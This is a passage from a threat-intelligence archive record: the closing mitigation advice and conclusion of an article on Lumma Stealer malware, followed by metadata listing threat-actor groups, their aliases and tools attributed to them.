reaching\r\nend-users.\r\nImplement Robust Access Controls and MFA: Enforce the principle of least privilege, limiting user permissions\r\nto the absolute minimum necessary to perform their roles. Implement strict policies on software installation and\r\nexecution. While Lumma Stealer has demonstrated capabilities to target 2FA tokens, combining Multi-Factor\r\nAuthentication (MFA) with other strong security layers, such as hardware tokens or biometric factors, significantly\r\nstrengthens access security. Post-infection, immediately reset all credentials associated with compromised accounts\r\nand revoke active user sessions to prevent cookie reuse.\r\nContinuous Vulnerability Management and Patching: Regularly scan for and promptly patch vulnerabilities\r\nacross all systems, applications, and network devices. Timely software updates are critically important, especially\r\ngiven Lumma’s tendency to exploit recently discovered vulnerabilities.\r\nRestrict Unverified Software: Prohibit and actively prevent the downloading and installation of cracked or pirated\r\nsoftware. Limit employee use of unofficial applications from untrusted sources, including those sometimes found on\r\npublic code repositories like GitHub.\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 7 of 8\n\nNetwork Segmentation: Implement network segmentation to divide the computer network into smaller, isolated\r\nsegments or subnetworks. This strategy helps to limit or block lateral movement of malware like Lumma Stealer,\r\nthereby containing potential infections and reducing their blast radius.\r\nAdopt Behavior-Based Monitoring: Prioritize and implement behavior-based monitoring solutions. These tools\r\nare crucial for detecting unusual activity patterns, such as suspicious processes attempting unauthorized network\r\nconnections or anomalous file access, which might be missed by traditional signature-based methods due to Lumma’s\r\nadvanced obfuscation.\r\nEstablish a Digital Risk Protection (DRP) Strategy: Develop and maintain a comprehensive DRP strategy to\r\nproactively monitor for exposed credentials and other sensitive organizational data on the dark web and other illicit\r\nmarketplaces.\r\nDevelop a Robust Incident Response Plan: Create and regularly test a comprehensive incident response plan that\r\nclearly outlines steps to take in the event of a malware infection. This should include immediate isolation of\r\ncompromised devices, locking active user sessions, blocking user accounts, re-imaging infected machines, and\r\nblocking identified IOCs at the firewall, proxy, and email gateway levels. In cases of persistent uncertainty or\r\ncomplex remediation, professional cybersecurity support from specialized incident response teams is highly\r\nrecommended.\r\nContinuous Security Awareness and Training: Implement continuous security awareness and training programs for\r\nall employees. Educate users on how to identify and avoid social engineering tactics, suspicious CAPTCHA prompts,\r\nmalicious links, and phishing attempts. Regular phishing simulations can significantly enhance employee vigilance\r\nand reduce the likelihood of accidental infection.\r\nConclusion: Lumma Stealer serves as a stark illustration of the evolving and persistent threat posed by information stealer\r\nmalware operating within a highly effective MaaS framework. Its rapid adoption, increasingly sophisticated evasion\r\ntechniques, and extensive data targeting capabilities have solidified its position as a dominant and formidable force within\r\nthe cybercrime ecosystem. While recent coordinated takedowns by international law enforcement and private sector partners\r\ndemonstrate the critical effectiveness of such collaborative efforts, the inherent resilience and continuous adaptability of\r\nLumma and its operators necessitate a perpetual, multi-layered defense strategy. Organizations and individuals alike must\r\nproactively prioritize robust security measures, including advanced threat intelligence, strong endpoint protection, stringent\r\naccess controls, continuous vulnerability management, and ongoing, adaptive security awareness training, to effectively\r\ncounter this dynamic and financially driven threat. The future trajectory of such malware likely involves even more evasive\r\nand deeply integrated variants, unequivocally reinforcing the ongoing and intense “battle between cybercriminals and\r\ndefenders”.\r\nSource: https://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nhttps://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/@raghavtiresearch/lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4" ], "report_names": [ "lumma-stealer-a-proliferating-threat-in-the-cybercrime-landscape-b5cdc3de44a4" ], "threat_actors": [ { "id": "77b28afd-8187-4917-a453-1d5a279cb5e4", "created_at": "2022-10-25T15:50:23.768278Z", "updated_at": "2026-04-10T02:00:05.266635Z", "deleted_at": null, "main_name": "Inception", "aliases": [ "Inception Framework", "Cloud Atlas" ], "source_name": "MITRE:Inception", "tools": [ "PowerShower", "VBShower", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "7da6012f-680b-48fb-80c4-1b8cf82efb9c", "created_at": "2023-11-01T02:01:06.643737Z", "updated_at": "2026-04-10T02:00:05.340198Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "Scattered Spider", "Roasted 0ktapus", "Octo Tempest", "Storm-0875", "UNC3944" ], "source_name": "MITRE:Scattered Spider", "tools": [ "WarzoneRAT", "Rclone", "LaZagne", "Mimikatz", "Raccoon Stealer", "ngrok", "BlackCat", "ConnectWise" ], "source_id": "MITRE", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3b908de-3dd1-4e5d-ba24-5af8217371f0", "created_at": "2023-10-03T02:00:08.510742Z", "updated_at": "2026-04-10T02:00:03.374705Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "UNC3944", "Scattered Swine", "Octo Tempest", "DEV-0971", "Starfraud", "Muddled Libra", "Oktapus", "Scatter Swine", "0ktapus", "Storm-0971" ], "source_name": "MISPGALAXY:Scattered Spider", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d093e8d9-b093-47b8-a988-2a5cbf3ccec9", "created_at": "2023-10-14T02:03:13.99057Z", "updated_at": "2026-04-10T02:00:04.531987Z", "deleted_at": null, "main_name": "Scattered Spider", "aliases": [ "0ktapus", "LUCR-3", "Muddled Libra", "Octo Tempest", "Scatter Swine", "Scattered Spider", "Star Fraud", "Storm-0875", "UNC3944" ], "source_name": "ETDA:Scattered Spider", "tools": [ "ADRecon", "AnyDesk", "ConnectWise", "DCSync", "FiveTran", "FleetDeck", "Govmomi", "Hekatomb", "Impacket", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "Lumma Stealer", "LummaC2", "Mimikatz", "Ngrok", "PingCastle", "ProcDump", "PsExec", "Pulseway", "Pure Storage FlashArray", "Pure Storage FlashArray PowerShell SDK", "RedLine Stealer", "Rsocx", "RustDesk", "ScreenConnect", "SharpHound", "Socat", "Spidey Bot", "Splashtop", "Stealc", "TacticalRMM", "Tailscale", "TightVNC", "VIDAR", "Vidar Stealer", "WinRAR", "WsTunnel", "gosecretsdump" ], "source_id": "ETDA", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "c6d22751-e854-47de-a33d-2adf0058683e", "created_at": "2025-03-03T02:02:00.191696Z", "updated_at": "2026-04-10T02:00:04.534478Z", "deleted_at": null, "main_name": "Angry Likho", "aliases": [], "source_name": "ETDA:Angry Likho", "tools": [ "Lumma Stealer", "LummaC2" ], "source_id": "ETDA", "reports": null }, { "id": "ce6c9df9-bf82-4e6c-b355-9285463a37c8", "created_at": "2025-03-07T02:00:03.792481Z", "updated_at": "2026-04-10T02:00:03.818734Z", "deleted_at": null, "main_name": "Angry Likho", "aliases": [ "Sticky Werewolf" ], "source_name": "MISPGALAXY:Angry Likho", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e424a2db-0f5a-4ee5-96d2-5ab16f1f3824", "created_at": "2024-06-19T02:03:08.062614Z", "updated_at": "2026-04-10T02:00:03.655475Z", "deleted_at": null, "main_name": "GOLD HARVEST", "aliases": [ "Octo Tempest ", "Roasted 0ktapus ", "Scatter Swine ", "Scattered Spider ", "UNC3944 " ], "source_name": "Secureworks:GOLD HARVEST", "tools": [ "AnyDesk", "ConnectWise Control", "Logmein" ], "source_id": "Secureworks", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775433976, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.pdf", "text": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.txt", "img": "https://archive.orkl.eu/446997379ebdfde8c75fcafaa57cbefc97fc6ef4.jpg" } }